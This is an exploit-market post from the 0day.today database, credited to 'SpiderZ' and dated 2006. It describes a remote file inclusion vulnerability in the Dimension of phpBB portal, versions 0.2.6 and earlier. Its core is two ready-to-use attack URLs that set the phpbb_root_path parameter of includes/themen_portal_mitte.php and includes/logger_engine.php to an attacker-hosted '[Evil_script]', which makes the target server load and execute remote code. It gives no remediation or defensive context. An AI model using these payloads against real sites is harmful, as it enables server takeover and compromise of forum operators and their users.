[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes

Author
SpiderZ
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-927
Category
web applications
Date add
04-10-2006
Platform
unsorted
==================================================================
Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes
==================================================================



_________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Dimension of phpBB Remote File Inclusion Vulnerability
# For: Dimension of phpBB 0.2.5 (phpBB 2.0.21)
_________________________________________________________________________


# Remote File Inclusion

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]


------------------------------------------------------------------------------



#  0day.today [2024-12-26]  #